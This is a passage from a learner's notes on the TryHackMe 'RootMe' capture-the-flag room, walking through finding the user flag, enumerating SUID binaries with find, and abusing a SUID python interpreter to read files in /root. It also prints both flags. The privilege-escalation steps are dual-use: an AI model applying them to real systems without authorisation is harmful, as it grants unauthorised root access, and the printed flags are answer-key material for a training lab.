MihirSahu/TryHackMe-Notes/CTF_Rooms/RootMe/Notes.md

 7. We're given the name of the file that contains the flag "user.txt", so we simple use the find command: "find / -type f -name user.txt" and we see that the file is at /var/www/user.txt and when we cat it we find that the flag is THM{y0u_g0t_a_sh3ll}

 8. Now we need to escalate our privileges to root.
 We're asked to search for files with the suid permission set - which lets any user execute the file with the permissions of the owner of the file - and find any files that are supicious.
 To do this we use find again: "find / -perm /4000 2> /dev/null" (we use "2> /dev/null" to get rid of any errors, such as permission errors for files we're not able to access)
+>/usr/lib/dbus-1.0/dbus-daemon-launch-helper
+>/usr/lib/snapd/snap-confine
+>/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
+>/usr/lib/eject/dmcrypt-get-device
+>/usr/lib/openssh/ssh-keysign
+>/usr/lib/policykit-1/polkit-agent-helper-1
+>/usr/bin/traceroute6.iputils
+>/usr/bin/newuidmap
+>/usr/bin/newgidmap
+>/usr/bin/chsh
+>/usr/bin/python
+>/usr/bin/at
+>/usr/bin/chfn
+>/usr/bin/gpasswd
+>/usr/bin/sudo
+>/usr/bin/newgrp
+>/usr/bin/passwd
+>/usr/bin/pkexec
+>/snap/core/8268/bin/mount
+>/snap/core/8268/bin/ping
+>/snap/core/8268/bin/ping6
+>/snap/core/8268/bin/su
+>/snap/core/8268/bin/umount
+>/snap/core/8268/usr/bin/chfn
+>/snap/core/8268/usr/bin/chsh
+>/snap/core/8268/usr/bin/gpasswd
+>/snap/core/8268/usr/bin/newgrp
+>/snap/core/8268/usr/bin/passwd
+>/snap/core/8268/usr/bin/sudo
+>/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
+>/snap/core/8268/usr/lib/openssh/ssh-keysign
+>/snap/core/8268/usr/lib/snapd/snap-confine
+>/snap/core/8268/usr/sbin/pppd
+>/snap/core/9665/bin/mount
+>/snap/core/9665/bin/ping
+>/snap/core/9665/bin/ping6
+>/snap/core/9665/bin/su
+>/snap/core/9665/bin/umount
+>/snap/core/9665/usr/bin/chfn
+>/snap/core/9665/usr/bin/chsh
+>/snap/core/9665/usr/bin/gpasswd
+>/snap/core/9665/usr/bin/newgrp
+>/snap/core/9665/usr/bin/passwd
+>/snap/core/9665/usr/bin/sudo
+>/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
+>/snap/core/9665/usr/lib/openssh/ssh-keysign
+>/snap/core/9665/usr/lib/snapd/snap-confine
+>/snap/core/9665/usr/sbin/pppd
+>/bin/mount
+>/bin/su
+>/bin/fusermount
+>/bin/ping
+>/bin/umount

+9. Looking through the results, we see nothing suspicious until we see python.
+Python's an interpreter for the python programming language, and setting SUID on it makes no sense because there's no reason to run it as root; it'll produce the same output no matter who runs it.
+We check if that's the binary that the challenge is looking for, and it is. "/usr/bin/python"

+10. Now we need to write some python code and run it with /usr/bin/python to let us view the contents of the /root directory (it's given that the last flag is called root.txt, so we'll assume that it's located in /root)

+11. I tried writing the code inside the shell we got from the reverse shell, but python and vim were acting weird, so I instead wrote the code inside the attacker machine, uploaded it to the server just like we did with the reverse php file, and used "find / -type d -name ```*uploads*``` 2> /dev/null" to find where the files we uploaded were located.
+I needed to find the location because I couldn't just execute the python file with curl like we did with the php payload.
+I found that the files were in /var/www/html/uploads

+12. After this, I wrote a basic python script to print out the contents or /root
+>#!/usr/bin/python
+>import os
+>
+>print(os.listdir('/root'))

+13. I then uploaded that to the server and used "/usr/bin/python /var/www/html/uploads/<filename>", and I see that root.txt is indeed in /root

+14. Finally, to print out the contents of root.txt, I wrote this script
+>#!/usr/bin/python
+>import os
+>
+>file = open('/root/root.txt', 'r')
+>print(file.read())

+The last flag is THM{pr1v1l3g3_3sc4l4t10n}